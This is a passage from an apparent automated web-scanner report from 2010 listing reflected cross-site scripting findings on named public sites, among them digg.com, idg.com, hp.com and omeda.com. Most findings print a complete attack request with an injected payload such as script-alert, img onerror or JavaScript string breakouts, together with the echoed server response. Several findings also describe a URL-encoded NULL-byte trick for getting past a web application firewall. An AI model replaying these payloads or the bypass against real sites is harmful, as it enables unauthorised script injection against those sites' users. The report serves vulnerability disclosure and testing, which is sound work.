GET /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded4b7a4<img%20src%3da%20onerror%3dalert(1)>a00070d10d9/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:/ad.doubleclick.net/clk HTTP/1.1 Host: cdn.widgetserver.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Thu, 16 Dec 2010 15:00:59 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Connection: close Content-Length: 17780
The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 5d93e<img%20src%3da%20onerror%3dalert(1)>6d74913966e was submitted in the REST URL parameter 9. This input was echoed as 5d93e<img src=a onerror=alert(1)>6d74913966e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db055d93e<img%20src%3da%20onerror%3dalert(1)>6d74913966e/ibm_backupe.png,wbx_ns_link,http:/ad.doubleclick.net/clk HTTP/1.1 Host: cdn.widgetserver.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Thu, 16 Dec 2010 15:01:01 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Connection: close Content-Length: 17788
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload abba8<script>alert(1)</script>cc716b12454 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cgi-winabba8<script>alert(1)</script>cc716b12454/cio.cgi HTTP/1.1 Host: cxo.omeda.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Thu, 16 Dec 2010 15:01:47 GMT Server: WebSitePro/2.5.8 Accept-ranges: bytes Content-type: text/html Content-length: 311
<HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD> <BODY bgcolor="White"><H2>404 Not Found</H2> The requested URL was not found on this server:<P><CODE>/cgi-winabba8<script>alert(1)</script>cc716b12454/cio.cgi<P> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cf65d<script>alert(1)</script>77b2e91fe7a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cgi-win/cio.cgicf65d<script>alert(1)</script>77b2e91fe7a HTTP/1.1 Host: cxo.omeda.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Thu, 16 Dec 2010 15:01:49 GMT Server: WebSitePro/2.5.8 Accept-ranges: bytes Content-type: text/html Content-length: 304
<HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD> <BODY bgcolor="White"><H2>404 Not Found</H2> The requested URL was not found on this server:<P><CODE>/cgi-win/cio.cgicf65d<script>alert(1)</script>77b2e91fe7a<P> ...[SNIP]...
2.92. https://cxo.omeda.com/cgi-win/cio.cgi [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://cxo.omeda.com
Path:
/cgi-win/cio.cgi
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 350aa"><script>alert(1)</script>3be711c838a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cgi-win/cio.cgi?350aa"><script>alert(1)</script>3be711c838a=1 HTTP/1.1 Host: cxo.omeda.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Thu, 16 Dec 2010 15:01:31 GMT Server: WebSitePro/2.5.8 Accept-ranges: bytes Content-type: text/html Content-length: 39866
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title ...[SNIP]... <input type="hidden" name="CALLINGURL" value="350aa"><script>alert(1)</script>3be711c838a=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0029eb0"><script>alert(1)</script>55798b8d873 was submitted in the REST URL parameter 1. This input was echoed as 29eb0"><script>alert(1)</script>55798b8d873 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /submit%0029eb0"><script>alert(1)</script>55798b8d873 HTTP/1.1 Host: digg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0099d9f"><script>alert(1)</script>ce39e2bb6df was submitted in the REST URL parameter 1. This input was echoed as 99d9f"><script>alert(1)</script>ce39e2bb6df in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /submit%0099d9f"><script>alert(1)</script>ce39e2bb6df/ HTTP/1.1 Host: digg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
2.95. https://h30406.www3.hp.com/campaigns/2010/promo/1-8KF4V/landing.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
https://h30406.www3.hp.com
Path:
/campaigns/2010/promo/1-8KF4V/landing.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51aa9"><a>24e2ae1112b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /campaigns/2010/promo/1-8KF4V/landing.php?51aa9"><a>24e2ae1112b=1 HTTP/1.1 Host: h30406.www3.hp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Thu, 16 Dec 2010 14:56:50 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-type: text/html X-Powered-By: PHP/4.3.8 Set-Cookie: regioncodecookie=NA; expires=Thu, 16-Dec-2010 14:57:50 GMT; path=/; domain=.hp.com
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us" xmlns:m="http://schemas.microsoft.com/office/2004/12/omml" xmlns:v="urn:schema ...[SNIP]... <iframe src="box1.php?51aa9"><a>24e2ae1112b=1" name="" id="overlay-iframe" width="416" height="250" marginwidth="6" marginheight="6" align="middle" frameborder="0" scrolling="no"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b26bf"><script>alert(1)</script>4ded530f900 was submitted in the REST URL parameter 1. This input was echoed as b26bf\"><script>alert(1)</script>4ded530f900 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /white-paperb26bf"><script>alert(1)</script>4ded530f900/ HTTP/1.1 Host: hs.maas360.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 14:57:16 GMT Server: Apache X-Powered-By: W3 Total Cache/0.8.5.2 X-Pingback: http://forum.maas360.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Link: <>; rel=shortlink Last-Modified: Thu, 16 Dec 2010 14:57:17 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 14748
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" >
2.97. http://hs.maas360.com/white-paper/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://hs.maas360.com
Path:
/white-paper/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9034b"><script>alert(1)</script>2067fc0dbd3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9034b\"><script>alert(1)</script>2067fc0dbd3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /white-paper/?9034b"><script>alert(1)</script>2067fc0dbd3=1 HTTP/1.1 Host: hs.maas360.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 14:56:54 GMT Server: Apache X-Powered-By: W3 Total Cache/0.8.5.2 X-Pingback: http://forum.maas360.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Link: <>; rel=shortlink Last-Modified: Thu, 16 Dec 2010 14:56:55 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 14755
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" >
2.98. http://idg.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://idg.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload faf07"-alert(1)-"514680829c4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?faf07"-alert(1)-"514680829c4=1 HTTP/1.1 Host: idg.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1
Response
HTTP/1.1 400 Bad Request Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:33 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5016 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf?faf07"-alert(1)-"514680829c4=1"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 641dd"%3be72f5765b93 was submitted in the REST URL parameter 2. This input was echoed as 641dd";e72f5765b93 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /idgnetrssfeeds.nsf/html641dd"%3be72f5765b93?openpage HTTP/1.1 Host: idg.com Proxy-Connection: keep-alive Referer: http://idg.com/www/homenew.nsf/home?readform Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:35 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5020 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /idgnetrssfeeds.nsf/html641dd";e72f5765b93?openpage"); } catch(err) {}</script> ...[SNIP]...
2.100. http://idg.com/idgnetrssfeeds.nsf/html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://idg.com
Path:
/idgnetrssfeeds.nsf/html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e793d"-alert(1)-"6a220bac59d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /idgnetrssfeeds.nsf/html?e793d"-alert(1)-"6a220bac59d=1 HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 400 Bad Request Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:01:13 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5024 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /idgnetrssfeeds.nsf/html?e793d"-alert(1)-"6a220bac59d=1"); } catch(err) {}</script> ...[SNIP]...
The value of the openpage request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8cfb4"-alert(1)-"de20b25edcb was submitted in the openpage parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /idgnetrssfeeds.nsf/html?openpage8cfb4"-alert(1)-"de20b25edcb HTTP/1.1 Host: idg.com Proxy-Connection: keep-alive Referer: http://idg.com/www/homenew.nsf/home?readform Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1
Response
HTTP/1.1 500 Internal Server Error Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:35 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5030 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /idgnetrssfeeds.nsf/html?openpage8cfb4"-alert(1)-"de20b25edcb"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f5bcd"%3b240f4a66d20 was submitted in the REST URL parameter 1. This input was echoed as f5bcd";240f4a66d20 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /wwwf5bcd"%3b240f4a66d20/HomeNew.nsf/docs/Brands HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:42 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5015 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /wwwf5bcd";240f4a66d20/HomeNew.nsf/docs/Brands"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 616ac"%3b7e80440585b was submitted in the REST URL parameter 3. This input was echoed as 616ac";7e80440585b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/HomeNew.nsf/docs616ac"%3b7e80440585b/Brands HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:42 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5015 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs616ac";7e80440585b/Brands"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8d4c8"%3b7c6e698891a was submitted in the REST URL parameter 4. This input was echoed as 8d4c8";7c6e698891a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/HomeNew.nsf/docs/Brands8d4c8"%3b7c6e698891a HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:43 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5015 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/Brands8d4c8";7c6e698891a"); } catch(err) {}</script> ...[SNIP]...
2.105. http://idg.com/www/HomeNew.nsf/docs/Brands [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://idg.com
Path:
/www/HomeNew.nsf/docs/Brands
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f5392"-alert(1)-"907c7a6363a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/HomeNew.nsf/docs/Brands?f5392"-alert(1)-"907c7a6363a=1 HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 400 Bad Request Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:41 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5028 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/Brands?f5392"-alert(1)-"907c7a6363a=1"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ac3e6"%3b4e4e67dc4b8 was submitted in the REST URL parameter 1. This input was echoed as ac3e6";4e4e67dc4b8 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /wwwac3e6"%3b4e4e67dc4b8/HomeNew.nsf/docs/FAQ HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:46 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5012 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /wwwac3e6";4e4e67dc4b8/HomeNew.nsf/docs/FAQ"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98ba3"%3bc63f355635b was submitted in the REST URL parameter 3. This input was echoed as 98ba3";c63f355635b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/HomeNew.nsf/docs98ba3"%3bc63f355635b/FAQ HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:48 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5012 Cache-control: no-cache
